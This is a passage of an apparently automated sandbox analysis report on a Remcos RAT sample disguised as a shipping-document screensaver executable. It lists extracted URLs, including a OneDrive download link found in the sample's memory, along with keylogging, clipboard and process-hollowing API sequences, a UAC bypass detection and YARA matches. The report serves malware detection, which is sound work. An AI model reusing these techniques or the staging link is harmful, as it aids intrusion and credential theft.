Source: bhv5415.tmp.36.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: glrkszlG.pif, 00000001.00000002.1772834423.00000000004B1000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000001.1681718586.00000000004A3000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794A2B8 SetWindowsHookExA 0000000D,2794A2A4,00000000

0_2_2794A2B8

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794B70E OpenClipboard,GetClipboardData,CloseClipboard,

0_2_2794B70E

Contains functionality to modify clipboard data

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	36_2_0040987A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	36_2_004098E2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	37_2_00406DFC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	37_2_00406E9F

Contains functionality to read the clipboard data

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794B70E OpenClipboard,GetClipboardData,CloseClipboard,

0_2_2794B70E

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

0_2_2794A3E0

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795C9E2 SystemParametersInfoW,

0_2_2795C9E2

Reads the Security eventlog

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior

Reads the System eventlog

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B81B8 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread,	0_2_028B81B8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC7B4 NtCreateFile,NtWriteFile,	0_2_028BC7B4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC724 NtDeleteFile,	0_2_028BC724
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7A94 NtWriteVirtualMemory,	0_2_028B7A94
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BDA24 NtQueryInformationProcess,	0_2_028BDA24
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC898 NtOpenFile,NtReadFile,	0_2_028BC898
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BD9A4 NtQueryInformationProcess,	0_2_028BD9A4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7944 NtAllocateVirtualMemory,	0_2_028B7944
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B81B6 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread,	0_2_028B81B6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC6AC NtDeleteFile,	0_2_028BC6AC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC7B2 NtCreateFile,NtWriteFile,	0_2_028BC7B2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7A92 NtWriteVirtualMemory,	0_2_028B7A92
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7942 NtAllocateVirtualMemory,	0_2_028B7942
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279580EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	0_2_279580EF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	0_2_2795D58F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795BB09 OpenProcess,NtSuspendProcess,CloseHandle,	0_2_2795BB09
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795BB35 OpenProcess,NtResumeProcess,CloseHandle,	0_2_2795BB35
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,	0_2_279532D2
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	5_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	5_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC8898C NtQueryInformationToken,	5_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	5_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	5_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	5_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	5_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	5_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	6_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	6_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC8898C NtQueryInformationToken,	6_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	6_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	6_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	6_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	6_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	6_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	9_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	9_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC8898C NtQueryInformationToken,	9_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	9_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	9_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	9_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	9_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	9_2_00007FF70CC888C0
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A39890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,	16_2_00007FF7E0A39890
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	31_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	31_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC8898C NtQueryInformationToken,	31_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	31_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	31_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	31_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	31_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	31_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,	32_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	32_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	32_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	32_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC8898C NtQueryInformationToken,	32_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	32_2_00007FF70CCA1538
